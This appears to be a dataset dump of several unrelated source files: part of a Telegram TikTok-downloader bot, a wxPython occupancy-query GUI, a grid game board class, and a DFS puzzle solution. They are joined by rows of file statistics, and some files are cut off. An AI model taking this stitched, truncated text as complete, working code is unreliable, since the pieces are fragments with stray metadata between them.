result = r.text
rs = json.loads(result)
link = rs['result']['nowm']
resp = session.head(link, allow_redirects=True)
r = requests.get(resp.url, allow_redirects=True)
        with open(f'{ttid}.mp4', 'wb') as f:
            f.write(r.content)
await bot.send_video(update.chat.id, f'{ttid}.mp4',)
shutil.rmtree(dirs)
elif cb.data == 'wm':
dirs = downloads.format(uuid.uuid4().hex)
os.makedirs(dirs)
cbb = cb
update = cbb.message.reply_to_message
await cb.message.delete()
url = update.text
session = requests.Session()
resp = session.head(url, allow_redirects=True)
if '?' in resp.url:
tt = resp.url.split('?', 1)[0]
else:
tt = resp.url
ttid = dirs+tt.split('/')[-1]
r = requests.get('https://api.reiyuura.me/api/dl/tiktok?url='+tt)
result = r.text
rs = json.loads(result)
link = rs['result']['wm']
resp = session.head(link, allow_redirects=True)
r = requests.get(resp.url, allow_redirects=True)
        with open(f'{ttid}.mp4', 'wb') as f:
            f.write(r.content)
await bot.send_video(update.chat.id, f'{ttid}.mp4',)
shutil.rmtree(dirs)
elif cb.data == 'audio':
dirs = downloads.format(uuid.uuid4().hex)
os.makedirs(dirs)
cbb = cb
update = cbb.message.reply_to_message
await cb.message.delete()
url = update.text
session = requests.Session()
resp = session.head(url, allow_redirects=True)
if '?' in resp.url:
tt = resp.url.split('?', 1)[0]
else:
tt = resp.url
ttid = dirs+tt.split('/')[-1]
r = requests.get('https://api.reiyuura.me/api/dl/tiktok?url='+tt)
result = r.text
rs = json.loads(result)
link = rs['result']['wm']
resp = session.head(link, allow_redirects=True)
r = requests.get(resp.url, allow_redirects=True)
        with open(f'{ttid}.mp4', 'wb') as f:
            f.write(r.content)
        cmd = f'ffmpeg -i "{ttid}.mp4" -vn -ar 44100 -ac 2 -ab 192k -f mp3 "{ttid}.mp3"'
await run_cmd(cmd)
await bot.send_audio(update.chat.id, f'{ttid}.mp3',)
shutil.rmtree(dirs)
xbot.run()
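# Hedged launch note (not part of the original file): the three variables
# above are read from the environment at import time, so they must be set
# before starting the bot, e.g. (placeholder values):
#
#   API_HASH=<api-hash> APP_ID=<app-id> BOT_TOKEN=<token> python bot.py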
| 33.757143
| 152
| 0.643039
| 634
| 4,726
| 4.711356
| 0.252366
| 0.030465
| 0.060261
| 0.049213
| 0.504185
| 0.483763
| 0.483763
| 0.483763
| 0.483763
| 0.483763
| 0
| 0.008463
| 0.199958
| 4,726
| 139
| 153
| 34
| 0.781539
| 0.019044
| 0
| 0.575
| 0
| 0.008333
| 0.139929
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.033333
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e12ba6cbfd755e451e70540ba00bbbd7d6bc8c
| 24,254
|
py
|
Python
|
frontend-gui/rpanel.py
|
skyu0221/660-iot
|
d31f973c93871bfa8122f1b83364d0147d402e9e
|
[
"Apache-2.0"
] | null | null | null |
frontend-gui/rpanel.py
|
skyu0221/660-iot
|
d31f973c93871bfa8122f1b83364d0147d402e9e
|
[
"Apache-2.0"
] | 8
|
2021-03-19T01:36:06.000Z
|
2022-03-12T00:22:43.000Z
|
frontend-gui/rpanel.py
|
skyu0221/660-iot
|
d31f973c93871bfa8122f1b83364d0147d402e9e
|
[
"Apache-2.0"
] | null | null | null |
import wx
import wx.adv
import random
import util
import config
import time
import datetime
import threading
import requests
import json
from functools import partial
class RequesterThread(threading.Thread):
# https://www.oreilly.com/library/view/python-cookbook/0596001673/ch06s03.html
def __init__(self, name, parent_thread, parent_panel):
threading.Thread.__init__(self, name=name)
self._stopevent = threading.Event()
self.parent_panel = parent_panel
self.parent_thread = parent_thread
def run(self):
while (not self._stopevent.is_set()) and self.parent_thread.is_alive():
print("hello")
# print(self.parent_panel.info_widget_dict)
# print(self.parent_panel.info)
            # change to real time
end = datetime.datetime.now()
start = end - datetime.timedelta(minutes=1)
self.parent_panel.info["start"] = util.convert_to_GMT_zone(start)
self.parent_panel.info["end"] = util.convert_to_GMT_zone(end)
self.parent_panel._send_request(self.parent_panel.info)
self._stopevent.wait(5.0)
def join(self, timeout=None):
self._stopevent.set()
print("thread stop")
threading.Thread.join(self, timeout)
class RightPanel(wx.Panel):
def __init__(self, parent, info={}):
wx.Panel.__init__(self, parent=parent)
self.drop_down_menu_ID = None
self.result_visual_ID = None
self.info = info
self._init_UI()
def _init_UI(self):
self.SetBackgroundColour("#BAB86C")
font = wx.SystemSettings.GetFont(wx.SYS_SYSTEM_FONT)
font.SetPointSize(20)
vbox = wx.BoxSizer(wx.VERTICAL)
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
# add question label
st1 = wx.StaticText(self, label='Question')
st1.SetFont(font)
hbox1.Add(st1, proportion=2, flag=wx.RIGHT, border=10)
# add drop down menu
question_list = [
"1. How many people are in the building?",
"2. How many people are in a specific room?",
"3. Where is someone?",
# "4. Which room has someone visited?",
"4. What is the utilization of a specific room?"
]
drop_down_menu = wx.ComboBox(self, choices=question_list)
hbox1.Add(drop_down_menu, proportion=8, flag=wx.TOP, border=5)
vbox1 = wx.BoxSizer(wx.VERTICAL)
# add result label
# st2 = wx.StaticText(self, label='Result')
# st2.SetFont(font)
# vbox1.Add(st2, proportion=1, flag=wx.ALIGN_CENTER, border=1)
# add canvas panel
# canvas_panel = CanvasPanel(self)
# vbox1.Add(canvas_panel, proportion=9, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM, border=10)
result_panel = ResultPanel(self)
# result_panel.SetBackgroundColour("#000000")
vbox1.Add(result_panel, proportion=9, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM, border=10)
vbox.Add(hbox1, proportion=1, flag=wx.EXPAND|wx.ALL, border=10)
vbox.Add(vbox1, proportion=9, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM, border=10)
self.SetSizer(vbox)
# listen combo
drop_down_menu.Bind(wx.EVT_COMBOBOX, partial(self.on_selection,
combo_box=drop_down_menu,
panel=result_panel))
def on_selection(self, event, combo_box, panel):
# print(self.drop_down_menu.GetValue())
print(combo_box.GetValue())
panel.init_question_UI(combo_box.GetValue()[0])
# st2 = wx.StaticText(self, label=combo_box.GetValue())
# st2.SetFont(font)
# sizer1.Add(st2, proportion=1, flag=wx.ALIGN_CENTER, border=1)
class ResultPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# self._init_UI()
self._q_dict = {"1": self._q1_panel,
"2": self._q2_panel,
"3": self._q3_panel,
# "4": self._q4_panel,
"4": self._q5_panel,}
self.info_widget_dict = {"feeder": {}, "consumer": {}}
self.worker = None
self.server = config.SERVER
self._set_font()
def _set_font(self):
self.font = wx.SystemSettings.GetFont(wx.SYS_SYSTEM_FONT)
self.font.SetPointSize(12)
self.font.MakeBold()
def init_question_UI(self, q_idx):
# clean the panel
for child in self.GetChildren():
child.Destroy()
# stop the worker
if self.worker:
# print("the worker has been stop")
self.worker.join()
self.worker = None
self.info_widget_dict["feeder"].clear()
self.info_widget_dict["consumer"].clear()
decorate_panel = self._q_dict[q_idx]
decorate_panel()
def add_date_time_picker_layout(self):
vbox = wx.BoxSizer(wx.VERTICAL)
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
hbox3 = wx.BoxSizer(wx.HORIZONTAL)
# Start
start_label = wx.StaticText(self, label="START TIME")
start_label.SetFont(self.font)
dpc1 = wx.adv.DatePickerCtrl(self, -1, wx.DefaultDateTime)
tpc1 = wx.adv.TimePickerCtrl(self, -1, wx.DefaultDateTime)
hbox1.Add(start_label, proportion=2, flag=wx.RIGHT|wx.TOP, border=4)
hbox1.Add(dpc1, proportion=3, flag=wx.RIGHT, border=5)
hbox1.Add(tpc1, proportion=3, flag=wx.RIGHT, border=5)
vbox.Add(hbox1, proportion=0, flag=wx.ALL, border=5)
# End
end_label = wx.StaticText(self, label="END TIME")
end_label.SetFont(self.font)
dpc2 = wx.adv.DatePickerCtrl(self, -1, wx.DefaultDateTime)
tpc2 = wx.adv.TimePickerCtrl(self, -1, wx.DefaultDateTime)
hbox2.Add(end_label, proportion=2, flag=wx.RIGHT|wx.TOP, border=4)
hbox2.Add(dpc2, proportion=3, flag=wx.RIGHT, border=5)
hbox2.Add(tpc2, proportion=3, flag=wx.RIGHT, border=5)
vbox.Add(hbox2, proportion=0, flag=wx.ALL, border=5)
# Real time box
real_label = wx.StaticText(self, label="REAL TIME")
real_label.SetFont(self.font)
cb = wx.CheckBox(self)
hbox3.Add(real_label, proportion=2, flag=wx.RIGHT|wx.TOP, border=4)
hbox3.Add(cb, proportion=3, flag=wx.RIGHT|wx.TOP, border=5)
vbox.Add(hbox3, proportion=0, flag=wx.ALL, border=5)
self.info_widget_dict["feeder"]["start_date"] = dpc1
self.info_widget_dict["feeder"]["start_time"] = tpc1
self.info_widget_dict["feeder"]["end_date"] = dpc2
self.info_widget_dict["feeder"]["end_time"] = tpc2
self.info_widget_dict["feeder"]["real_time"] = cb
# self.SetBackgroundColour("#000000")
# r = lambda: random.randint(0,255)
# color = '#%02X%02X%02X' % (r(),r(),r())
return vbox
def _add_confirm_button(self, sizer, question_index):
"""
        question_index => {1, 2, 3, 4, 5}
"""
comfirm_btn = wx.Button(self, id=-1, label="Confirm")
sizer.Add(comfirm_btn, proportion=0, flag=wx.TOP|wx.LEFT, border=5)
# self.Bind(wx.EVT_BUTTON, self.OnClick, comfirm_btn)
self.Bind(wx.EVT_BUTTON, lambda event: self.OnClick(event, question_index), comfirm_btn)
def _add_result_label(self, sizer):
result_label = wx.StaticText(self, label="RESULT")
font = wx.SystemSettings.GetFont(wx.SYS_SYSTEM_FONT)
font.SetPointSize(20)
font.MakeBold()
result_label.SetFont(font)
sizer.Add(result_label, proportion=0, flag=wx.ALIGN_CENTER_HORIZONTAL, border=20)
def OnClick(self, event, question_index):
info = {}
# handle date and time
if question_index in [1, 2, 3, 4]:
start_date = self.info_widget_dict["feeder"]["start_date"].GetValue()
start_time = self.info_widget_dict["feeder"]["start_time"].GetValue()
end_date = self.info_widget_dict["feeder"]["end_date"].GetValue()
end_time = self.info_widget_dict["feeder"]["end_time"].GetValue()
info["start"] = util.combine_datetime(start_date, start_time)
info["end"] = util.combine_datetime(end_date, end_time)
# print("start time = {}".format(info["start"]))
# print("end time = {}".format(info["end"]))
if_real_time = self.info_widget_dict["feeder"]["real_time"].GetValue()
if question_index == 1:
# requester send request to server
pass
elif question_index == 2:
# requester send request to server
room = self.info_widget_dict["feeder"]["room_select"].GetValue()
print(room)
info["room"] = room
elif question_index == 3:
# requester send request to server
name = self.info_widget_dict["feeder"]["name_select"].GetValue()
print(name)
info["name"] = name
else: # question_index = 4
name = self.info_widget_dict["feeder"]["name_select"].GetValue()
print(name)
info["name"] = name
else: # question_index == 5
if_real_time = False
date = self.info_widget_dict["feeder"]["date_picker"].GetValue()
time = self.info_widget_dict["feeder"]["time_picker"].GetValue()
room = self.info_widget_dict["feeder"]["room_select"].GetValue()
info["date"] = util.combine_datetime(date, time)
info["room"] = room
# requester send request to server
info["question_index"] = question_index
self.info = info
if if_real_time:
if not self.worker:
                self.worker = RequesterThread(name="question_{}_requester".format(question_index), parent_thread=threading.currentThread(), parent_panel=self)
self.worker.start()
print("start worker")
else:
# first check if the worker is working
if self.worker:
self.worker.join()
self.worker = None
self._send_request(info)
def _request_handle(self, url, body={}, params={}, METHOD="post"):
# https://stackoverflow.com/questions/15900338/python-request-post-with-param-data
print("url", url)
print("body", body)
print("params", params)
resp = {}
if METHOD == "post":
r = requests.post(url, data=body)
else:
r = requests.get(url, params=params)
print(r.status_code)
if r.status_code == 200:
resp = r.json()
print(resp)
print(type(resp))
return resp
def _send_request(self, info):
question_index = int(info["question_index"])
if question_index == 1:
## get ##
url = self.server + "/people_building/"
body = {"start": info["start"], "end": info["end"]}
# body = {'start': '2020-04-05 21:00:00', 'end': '2020-04-05 21:10:00'}
response = self._request_handle(url=url, body=body, METHOD="post")
try:
occu = str(response['count'])
            except Exception:
occu = str(0)
## received##
self.info_widget_dict["consumer"]["occu_label"].SetLabel(occu)
elif question_index == 2:
## get ##
url = self.server + "/people_room/"
body = {"room": info["room"],
"start": info["start"],
"end": info["end"],
# 'start': '2020-04-05 21:00:00', 'end': '2020-04-05 21:10:00'
}
response = self._request_handle(url=url, body=body, METHOD="post")
try:
occu = str(response['count'])
occupancy_info = response['occupancy_info']
            except Exception:
occu = str(0)
occupancy_info = []
## received ##
self.info_widget_dict["consumer"]["occu_label"].SetLabel(occu)
nlb = self.info_widget_dict["consumer"]["name_list"]
nlb.Clear()
for name in occupancy_info:
nlb.Append(name)
elif question_index == 3:
## get ##
url = self.server + "/person_room/"
body = {"name": info["name"],
"start": info["start"],
"end": info["end"],
# 'start': '2020-04-05 21:00:00', 'end': '2020-04-05 21:10:00'
}
response = self._request_handle(url=url, body=body, METHOD="post")
try:
room_list = response['room']
count = str(len(room_list))
            except Exception:
count = str(0)
room_list = []
## received ##
self.info_widget_dict["consumer"]["count_label"].SetLabel(count)
rlb = self.info_widget_dict["consumer"]["room_list"]
rlb.Clear()
for name in room_list:
rlb.Append(name)
elif question_index == 4:
## get ##
url = self.server + "question/4"
body = {"name": info["name"],
# "start_time": info["start"],
# "end_time": info["end"],
"time": info["start"],
}
response = self._request_handle(url=url, body=body, METHOD="post")
count = str(random.randint(0, 20))
room_list = ["Room_1_1_140", "Room_1_1_141"]
## received ##
self.info_widget_dict["consumer"]["count_label"].SetLabel(count)
rlb = self.info_widget_dict["consumer"]["room_list"]
rlb.Clear()
for name in room_list:
rlb.Append(name)
elif question_index == 5:
## get ##
url = self.server + "/utilization/"
body = {"room": info["room"],
"date": info["date"],
# 'date': '2020-04-05 20:00:00'
}
response = self._request_handle(url=url, body=body, METHOD="post")
# self.request_handle(url, body, METHOD="post")
            try:
                # _request_handle already returns a parsed dict; no json.loads needed
                utilization = "{:.2f}".format(response["utilization"] * 100) + "%"
            except Exception:
                utilization = "0%"
## received##
self.info_widget_dict["consumer"]["utilization_label"].SetLabel(utilization)
def _q1_panel(self):
print("q1")
main_vbox = self.add_date_time_picker_layout()
# confirm button
self._add_confirm_button(main_vbox, 1)
# add result label
self._add_result_label(main_vbox)
# add result widget
hbox = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, label="Occupancy")
label.SetFont(self.font)
hbox.Add(label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
occu_label = wx.StaticText(self, label="__")
occu_label.SetFont(self.font)
hbox.Add(occu_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
main_vbox.Add(hbox, proportion=0, flag=wx.ALL, border=5)
self.info_widget_dict["consumer"]["occu_label"] = occu_label
self.SetSizer(main_vbox)
# https://stackoverflow.com/questions/42365239/wxpython-after-changing-panel-and-redo-layout-panel-is-very-small
self.Fit()
self.GetParent().SendSizeEvent()
def _q2_panel(self):
print("q2")
main_vbox = self.add_date_time_picker_layout()
# Room Info
room_hbox = wx.BoxSizer(wx.HORIZONTAL)
room_label = wx.StaticText(self, label="Room")
room_label.SetFont(self.font)
room_hbox.Add(room_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
room_list = [
"",
"Room_1_1_140",
"Room_1_1_141",
"Room_1_1_142",
"Room_1_1_143",
"Room_1_1_144",
"Room_1_1_150",
"Room_1_1_184"]
room_combobox = wx.ComboBox(self, choices=room_list)
room_hbox.Add(room_combobox, proportion=8, flag=wx.TOP, border=5)
# room_info = wx.TextCtrl(self)
# room_hbox.Add(room_combobox, proportion=8, flag=wx.TOP, border=5)
main_vbox.Add(room_hbox, proportion=0, flag=wx.ALL, border=5)
# confirm button
self._add_confirm_button(main_vbox, 2)
# add result label
self._add_result_label(main_vbox)
        # add widget information to dict
self.info_widget_dict["feeder"]["room_select"] = room_combobox
# add result widget
# add count
hbox = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, label="Occupancy")
label.SetFont(self.font)
hbox.Add(label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
occu_label = wx.StaticText(self, label="__")
occu_label.SetFont(self.font)
hbox.Add(occu_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
main_vbox.Add(hbox, proportion=0, flag=wx.ALL, border=5)
# add name list
namelb = wx.ListBox(self)
main_vbox.Add(namelb, proportion=0, flag=wx.ALL, border=5)
self.info_widget_dict["consumer"]["occu_label"] = occu_label
self.info_widget_dict["consumer"]["name_list"] = namelb
self.SetSizer(main_vbox)
# https://stackoverflow.com/questions/42365239/wxpython-after-changing-panel-and-redo-layout-panel-is-very-small
self.Fit()
self.GetParent().SendSizeEvent()
def _q3_panel(self):
print("q3")
vbox = self.add_date_time_picker_layout()
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
name_label = wx.StaticText(self, label="Name")
name_label.SetFont(self.font)
hbox1.Add(name_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
name_text_ctrl = wx.TextCtrl(self)
name_text_ctrl.AppendText('Please enter unique name')
hbox1.Add(name_text_ctrl, proportion=8, flag=wx.TOP, border=5)
vbox.Add(hbox1, proportion=0, flag=wx.ALL, border=5)
# confirm button
self._add_confirm_button(vbox, 3)
# add result label
self._add_result_label(vbox)
        # add widget information to dict
self.info_widget_dict["feeder"]["name_select"] = name_text_ctrl
# add result widget
# add count
hbox = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, label="Room Count")
label.SetFont(self.font)
hbox.Add(label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
occu_label = wx.StaticText(self, label="__")
occu_label.SetFont(self.font)
hbox.Add(occu_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
vbox.Add(hbox, proportion=0, flag=wx.ALL, border=5)
# add name list
roomlb = wx.ListBox(self)
vbox.Add(roomlb, proportion=0, flag=wx.ALL, border=5)
self.info_widget_dict["consumer"]["count_label"] = occu_label
self.info_widget_dict["consumer"]["room_list"] = roomlb
self.SetSizer(vbox)
# https://stackoverflow.com/questions/42365239/wxpython-after-changing-panel-and-redo-layout-panel-is-very-small
self.Fit()
self.GetParent().SendSizeEvent()
def _q4_panel(self):
print("q4")
main_vbox = self.add_date_time_picker_layout()
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
name_label = wx.StaticText(self, label="Name")
name_label.SetFont(self.font)
hbox1.Add(name_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
name_text_ctrl = wx.TextCtrl(self)
name_text_ctrl.AppendText('Please enter unique name')
hbox1.Add(name_text_ctrl, proportion=8, flag=wx.TOP, border=5)
main_vbox.Add(hbox1, proportion=0, flag=wx.ALL, border=5)
# confirm button
self._add_confirm_button(main_vbox, 4)
# add result label
self._add_result_label(main_vbox)
        # add widget information to dict
self.info_widget_dict["feeder"]["name_select"] = name_text_ctrl
# add result widget
# add count
hbox = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, label="Room Count")
label.SetFont(self.font)
hbox.Add(label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
occu_label = wx.StaticText(self, label="__")
occu_label.SetFont(self.font)
hbox.Add(occu_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
main_vbox.Add(hbox, proportion=0, flag=wx.ALL, border=5)
# add name list
roomlb = wx.ListBox(self)
main_vbox.Add(roomlb, proportion=0, flag=wx.ALL, border=5)
self.info_widget_dict["consumer"]["count_label"] = occu_label
self.info_widget_dict["consumer"]["room_list"] = roomlb
self.SetSizer(main_vbox)
# https://stackoverflow.com/questions/42365239/wxpython-after-changing-panel-and-redo-layout-panel-is-very-small
self.Fit()
self.GetParent().SendSizeEvent()
def _q5_panel(self):
print("q5")
vbox = wx.BoxSizer(wx.VERTICAL)
# datetime
date_hbox = wx.BoxSizer(wx.HORIZONTAL)
date_label = wx.StaticText(self, label="Datetime")
date_label.SetFont(self.font)
dpc = wx.adv.DatePickerCtrl(self, -1, wx.DefaultDateTime)
tpc = wx.adv.TimePickerCtrl(self, -1, wx.DefaultDateTime)
date_hbox.Add(date_label, proportion=2, flag=wx.RIGHT|wx.TOP, border=4)
date_hbox.Add(dpc, proportion=3, flag=wx.RIGHT, border=5)
date_hbox.Add(tpc, proportion=3, flag=wx.RIGHT, border=5)
vbox.Add(date_hbox, proportion=0, flag=wx.ALL, border=5)
# Room Info
room_hbox = wx.BoxSizer(wx.HORIZONTAL)
room_label = wx.StaticText(self, label="Room")
room_label.SetFont(self.font)
room_hbox.Add(room_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
room_list = [
"",
"Room_1_1_140",
"Room_1_1_141",
"Room_1_1_142",
"Room_1_1_143",
"Room_1_1_144",
"Room_1_1_150",
"Room_1_1_184"]
room_combobox = wx.ComboBox(self, choices=room_list)
room_hbox.Add(room_combobox, proportion=8, flag=wx.TOP, border=5)
vbox.Add(room_hbox, proportion=0, flag=wx.ALL, border=5)
# confirm button
self._add_confirm_button(vbox, 5)
# add result label
self._add_result_label(vbox)
        # add widget information to dict
self.info_widget_dict["feeder"]["date_picker"] = dpc
self.info_widget_dict["feeder"]["time_picker"] = tpc
self.info_widget_dict["feeder"]["room_select"] = room_combobox
# add result widget
hbox = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, label="Utilization")
label.SetFont(self.font)
hbox.Add(label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
occu_label = wx.StaticText(self, label="__")
occu_label.SetFont(self.font)
hbox.Add(occu_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
vbox.Add(hbox, proportion=0, flag=wx.ALL, border=5)
self.info_widget_dict["consumer"]["utilization_label"] = occu_label
self.SetSizer(vbox)
# https://stackoverflow.com/questions/42365239/wxpython-after-changing-panel-and-redo-layout-panel-is-very-small
self.Fit()
self.GetParent().SendSizeEvent()
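# Hedged smoke-test harness (not part of the original file): assumes util
# and config import as in the project and that config.SERVER points at a
# running backend.
#
#   if __name__ == '__main__':
#       app = wx.App()
#       frame = wx.Frame(None, title='RightPanel demo', size=(800, 600))
#       RightPanel(frame)
#       frame.Show()
#       app.MainLoop()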
| 34.599144
| 158
| 0.580564
| 2,968
| 24,254
| 4.55593
| 0.096361
| 0.024848
| 0.043485
| 0.054578
| 0.651679
| 0.59259
| 0.580905
| 0.5088
| 0.49327
| 0.479515
| 0
| 0.030045
| 0.293271
| 24,254
| 700
| 159
| 34.648571
| 0.758824
| 0.123196
| 0
| 0.464455
| 0
| 0
| 0.075221
| 0.000995
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047393
| false
| 0.00237
| 0.026066
| 0
| 0.085308
| 0.042654
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e280ff84ed8b441621c5c137faf53691c8d37c
| 3,422
|
py
|
Python
|
Bot/Bot/board.py
|
Baidi96/AI-Agent-for-Light-Rider
|
6ae0cd4ea07248751c0f015ed74123ae3dec33d1
|
[
"MIT"
] | 1
|
2019-12-18T08:24:22.000Z
|
2019-12-18T08:24:22.000Z
|
Bot/Bot/board.py
|
Baidi96/AI-Agent-for-Light-Rider
|
6ae0cd4ea07248751c0f015ed74123ae3dec33d1
|
[
"MIT"
] | null | null | null |
Bot/Bot/board.py
|
Baidi96/AI-Agent-for-Light-Rider
|
6ae0cd4ea07248751c0f015ed74123ae3dec33d1
|
[
"MIT"
] | null | null | null |
import copy
import sys
PLAYER1, PLAYER2, EMPTY, BLOCKED = [0, 1, 2, 3]
S_PLAYER1, S_PLAYER2, S_EMPTY, S_BLOCKED = ['0', '1', '.', 'x']
CHARTABLE = [(PLAYER1, S_PLAYER1), (PLAYER2, S_PLAYER2), (EMPTY, S_EMPTY), (BLOCKED, S_BLOCKED)]
DIRS = [
((-1, 0), "up"),
((1, 0), "down"),
((0, 1), "right"),
((0, -1), "left")
]
# The information of the whole grid
class Board:
def __init__(self, width, height):
self.width = width
self.height = height
self.cell = [[EMPTY for col in range (0, width)] for row in range(0, height)]
def parse_cell_char(self, players, row, col, char):
result = -1
if char == S_PLAYER1:
            players[0].row = row
            players[0].col = col
        elif char == S_PLAYER2:
            players[1].row = row
            players[1].col = col
for (i, symbol) in CHARTABLE:
if symbol == char:
result = i
break
return result
def parse_cell(self, players, row, col, data):
cell = []
for char in data:
item = self.parse_cell_char(players, row, col, char)
cell.append(item)
return cell
def parse(self, players, data):
cells = data.split(',')
col = 0
row = 0
for cell in cells:
            if col >= self.width:
                col = 0
                row += 1
self.cell[row][col] = self.parse_cell(players, row, col, cell)
col += 1
def in_bounds (self, row, col):
return row >= 0 and col >= 0 and col < self.width and row < self.height
def is_legal(self, row, col, my_id):
enemy_id = my_id ^ 1
return (self.in_bounds(row, col)) and (not BLOCKED == self.cell[row][col]) and (not enemy_id == self.cell[row][col])
    def is_legal_tuple(self, loc, my_id):
        row, col = loc
        return self.is_legal(row, col, my_id)
    def get_adjacent(self, row, col, my_id):
        # my_id is required by is_legal to treat the enemy's cells as blocked
        result = []
        for (o_row, o_col), _ in DIRS:
            t_row, t_col = o_row + row, o_col + col
            if self.is_legal(t_row, t_col, my_id):
                result.append((t_row, t_col))
        return result
def legal_moves(self, my_id, players):
my_player = players[my_id]
result = []
for ((o_row, o_col), order) in DIRS:
t_row = my_player.row + o_row
t_col = my_player.col + o_col
if self.is_legal(t_row, t_col, my_id):
result.append(((o_row, o_col), order))
return result
def update_cell(self, row, col, data):
self.cell[row][col] = data
def output_cell(self, cell):
done = False
for (i, symbol) in CHARTABLE:
if i == cell:
if not done:
sys.stderr.write(symbol)
done = True
break
if not done:
sys.stderr.write("!")
done = True
def output(self):
for row in self.cell:
sys.stderr.write("\n")
for cell in row:
self.output_cell(cell)
sys.stderr.write("\n")
sys.stderr.flush()
def tostring(self):
res = ""
        for row in range(self.height):
            for col in range(self.width):
res += str(self.cell[row][col])
res += ","
return res
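# A minimal usage sketch for Board (the _Player stand-in is hypothetical;
# the real bot presumably supplies player objects with row/col attributes).
class _Player:
    def __init__(self):
        self.row = self.col = 0

if __name__ == "__main__":
    board = Board(4, 4)
    players = [_Player(), _Player()]
    # 16 comma-separated cells: the two players in opposite corners
    field = "0," + ",".join(["."] * 14) + ",1"
    board.parse(players, field)
    # From (0, 0) only down/right stay on the grid:
    print(board.legal_moves(0, players))  # [((1, 0), 'down'), ((0, 1), 'right')]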
| 29.247863
| 124
| 0.504383
| 457
| 3,422
| 3.636761
| 0.183807
| 0.057762
| 0.033093
| 0.042118
| 0.138387
| 0.104693
| 0.028881
| 0.028881
| 0.028881
| 0
| 0
| 0.018097
| 0.370251
| 3,422
| 116
| 125
| 29.5
| 0.753132
| 0.009643
| 0
| 0.173469
| 0
| 0
| 0.007674
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.132653
| false
| 0.010204
| 0.020408
| 0.010204
| 0.244898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e2b128cd1d2cb827ad4460d329a4ebc4a12998
| 884
|
py
|
Python
|
baekjoon/1012.py
|
wonnerky/coteMaster
|
360e491e6342c1ee42ff49750b838a2ead865613
|
[
"Apache-2.0"
] | null | null | null |
baekjoon/1012.py
|
wonnerky/coteMaster
|
360e491e6342c1ee42ff49750b838a2ead865613
|
[
"Apache-2.0"
] | null | null | null |
baekjoon/1012.py
|
wonnerky/coteMaster
|
360e491e6342c1ee42ff49750b838a2ead865613
|
[
"Apache-2.0"
] | null | null | null |
import sys
sys.setrecursionlimit(10000)
def dfs(r, c):
global visit
visit[r][c] = True
mov = [(-1, 0), (0, -1), (1, 0), (0, 1)]
for i in range(4):
dr, dc = mov[i]
nr, nc = r + dr, c + dc
        if 0 <= nr < N and 0 <= nc < M and not visit[nr][nc] and board[nr][nc] == 1:
dfs(nr, nc)
T = int(input())
for _ in range(T):
M, N, K = map(int, input().split())
board = [[0] * M for _ in range(N)]
for _ in range(K):
c, r = map(int, input().split())
board[r][c] = 1
visit = [[False] * M for _ in range(N)]
cnt = 0
for r in range(N):
for c in range(M):
if not visit[r][c] and board[r][c] == 1:
cnt += 1
dfs(r, c)
    # debug output only; the judge for this problem expects just the count below
    # for ele in visit:
    #     print(ele)
    # print()
print(cnt)
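# An equivalent queue-based flood fill (a sketch under the same input
# format) that avoids deep recursion and the recursion-limit tweak entirely.
from collections import deque

def count_regions(board, N, M):
    seen = [[False] * M for _ in range(N)]
    regions = 0
    for sr in range(N):
        for sc in range(M):
            if board[sr][sc] == 1 and not seen[sr][sc]:
                regions += 1
                seen[sr][sc] = True
                queue = deque([(sr, sc)])
                while queue:
                    r, c = queue.popleft()
                    for dr, dc in ((-1, 0), (0, -1), (1, 0), (0, 1)):
                        nr, nc = r + dr, c + dc
                        if 0 <= nr < N and 0 <= nc < M and not seen[nr][nc] and board[nr][nc] == 1:
                            seen[nr][nc] = True
                            queue.append((nr, nc))
    return regions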
| 27.625
| 90
| 0.417421
| 138
| 884
| 2.644928
| 0.282609
| 0.134247
